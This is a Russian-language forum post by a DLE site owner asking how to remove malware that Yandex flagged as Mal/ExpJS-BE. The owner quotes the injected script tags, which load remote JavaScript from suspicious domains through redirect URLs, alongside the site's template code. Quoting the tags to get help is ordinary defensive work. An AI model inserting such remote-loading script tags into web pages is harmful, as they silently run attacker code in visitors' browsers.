Помогите найти вирус! Mal/ExpJS-BE

Всем привет! Яндекс уведомил, что сайт может угрожать опасности, вердикт - Mal/ExpJS-BE. Вначале вредоносный код

<script src="//liveinternet.ru/click?joprtyyyer.gettrials.com/78673421.js"></script>

дописывался в баннерах (сайт на DLE), но когда я начал писать банеры в ручную без использования тегов типо {banner_header}, то код начал дописываться как-то через ajax

<script>(function(d, s, id) {

  var js, fjs = d.getElementsByTagName(s)[0];

  if (d.getElementById(id)) return;

  js = d.createElement(s); js.id = id;

  js.src = "//connect.facebook.net/ru_RU/all.js#xfbml=1";

  fjs.parentNode.insertBefore(js, fjs);

}(document, 'script', 'facebook-jssdk'));</script>

<script src="//li.ru/click?olllaooosq.wha.la/78673421.js"></script>

<div id="loading-layer" style="display:none">Загрузка. Пожалуйста, подождите...</div>

В шаблоне main.tpl это выглядит так

<script>(function(d, s, id) {

  var js, fjs = d.getElementsByTagName(s)[0];

  if (d.getElementById(id)) return;

  js = d.createElement(s); js.id = id;

  js.src = "//connect.facebook.net/ru_RU/all.js#xfbml=1";

  fjs.parentNode.insertBefore(js, fjs);

}(document, 'script', 'facebook-jssdk'));</script>

{AJAX}

Как удалить этот вредоносный код? Сайт: _microsoftportal.net